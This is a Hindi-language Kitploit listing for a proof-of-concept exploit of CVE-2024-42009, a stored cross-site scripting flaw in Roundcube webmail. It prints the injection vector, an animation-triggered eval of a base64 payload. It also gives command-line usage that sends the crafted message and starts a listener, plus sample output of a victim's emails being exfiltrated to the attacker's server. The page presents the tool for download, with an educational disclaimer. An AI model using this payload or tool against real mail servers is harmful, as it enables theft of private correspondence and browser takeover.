Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-42009-PoC — CVE-2024-42009 अवधारणा का प्रमाण | Kitploit
उपकरण/GitHubGitHub/danithehack3r/cve-2024-42009-poc
फ़िशिंग उपकरणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनलर्निंग और शिक्षाईमेल सुरक्षा
GitHubdanithehack3r/cve-2024-42009-poc

CVE-2024-42009-PoC

CVE-2024-42009 अवधारणा का प्रमाण

रिपॉजिटरी देखें
711 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-42009 PoC: Roundcube वेबमेल में ईमेल कैप्चर लिसनर और XSS एक्सप्लॉइट

अवलोकन

इस रिपॉज़िटरी में CVE-2024-42009 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट है, जो Roundcube वेबमेल संस्करण 1.6.7 और अन्य कई संस्करणों में एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता है। यह एक्सप्लॉइट दर्शाता है कि कैसे एक हमलावर किसी संदेश में दुर्भावनापूर्ण JavaScript इंजेक्ट कर सकता है और संदेश के अंदर HTML पार्स करते समय डिसैनिटाइज़ेशन समस्या का फायदा उठा सकता है, जिसका उपयोग इस उदाहरण में पीड़ित के इनबॉक्स से ईमेल सामग्री निकालने या पीड़ित के ब्राउज़र को भी अपने कब्जे में लेने के लिए किया जा सकता है।

भेद्यता विवरण

CVE विवरण

Roundcube 1.5.7 तक और 1.6.x से 1.6.7 तक के संस्करणों में एक क्रॉस-साइट स्क्रिप्टिंग भेद्यता एक दूरस्थ हमलावर को program/actions/mail/show.php में message_body() में डिसैनिटाइज़ेशन समस्या का दुरुपयोग करने वाले गढ़े गए ईमेल संदेश के माध्यम से पीड़ित के ईमेल चुराने और भेजने की अनुमति देती है।

XSS पेलोड स्पष्टीकरण (इस उदाहरण के लिए)

एक्सप्लॉइट XSS निष्पादन के लिए CSS एनीमेशन ट्रिगर का उपयोग करता है:

root@kitploit:~
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=eval(atob('BASE64_PAYLOAD')) foo=bar>

बॉडी को एक div के रूप में पार्स किया जाता है, और फिर हमें उसके अनुकूल होने की आवश्यकता होती है, इसीलिए हम eval फ़ंक्शन को कॉल करने और उससे जटिल JavaScript कॉल्स निष्पादित करने के लिए onanimationstart विशेषता का उपयोग करते हैं। यह समझने के लिए कि एक्सप्लॉइट कैसे काम करता है और Roundcube में भेद्यताएँ कहाँ हैं, यह लेख पढ़ें।

दायरा

  • यह एक्सप्लॉइट केवल Roundcube वेबमेल संस्करण 1.6.7 पर परीक्षण किया गया था
  • पीड़ित को इसकी सामग्री देखने के लिए संदेश खोलना आवश्यक है
  • यदि कंटेंट सिक्योरिटी पॉलिसी (CSP) सही ढंग से कॉन्फ़िगर की गई है तो विफल हो सकता है

उपयोग

निर्भरताएँ

आवश्यक Python पैकेज इंस्टॉल करें:

root@kitploit:~
python3 -m venv venv
python3 -m pip install -r requirements

कमांड लाइन तर्क

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -r <RECIPIENT_EMAIL> -l <LISTENER_HOST> -p <LISTENER_PORT>
  • टार्गेट URL: इस मामले में हम कॉन्टैक्ट फ़ॉर्म एंडपॉइंट का उपयोग कर रहे हैं जो संदेशों को संभालता है और फिर उन्हें आगे भेजता है (जैसे, http://email.company.local/contact)
  • प्राप्तकर्ता ईमेल: एक मान्य ईमेल पता जो दुर्भावनापूर्ण संदेश प्राप्त करेगा
  • लिसनर होस्ट: आपके सिस्टम का IP पता जो टार्गेट से एक्सेस किया जा सके
  • लिसनर पोर्ट: HTTP सर्वर के लिए उपलब्ध पोर्ट (जैसे, 4444)

उदाहरण उपयोग

root@kitploit:~
python3 exploit.py -u http://webmail.target.com/contact -r [email protected] -l 192.168.1.100 -p 4444

अपेक्षित आउटपुट

root@kitploit:~
[*] Crafting payload for http://webmail.target.com/contact with recipient [email protected]
[*] Sending payload to http://webmail.target.com/contact with recipient [email protected]  
[*] Starting HTTP server on port 4444
[+] HTTP server listening on port 4444
[*] Waiting for emails... (Press Ctrl+C to stop manually)
[+] Received 3 emails!

------------------------------------------------------------
📧 EMAIL UID: 1  
------------------------------------------------------------
From: [email protected]
Subject: Quarterly Report
Message:
Please find attached the quarterly financial report...
------------------------------------------------------------

[+] Email exfiltration complete! Shutting down server...
[+] Server stopped successfully!

संदर्भ

भेद्यता अनुसंधान

  • SonarSource ब्लॉग: सरकारी ईमेल जोखिम में - Roundcube वेबमेल में गंभीर क्रॉस-साइट स्क्रिप्टिंग भेद्यता
  • SonarSource प्रदर्शन वीडियो

कानूनी अस्वीकरण

⚠️ महत्वपूर्ण: यह प्रूफ-ऑफ-कॉन्सेप्ट केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इसका उपयोग जिम्मेदारी से करें और यह अकाउंट दूसरों द्वारा किए गए किसी भी नुकसान के लिए ज़िम्मेदार नहीं है।

टूल डाउनलोड करें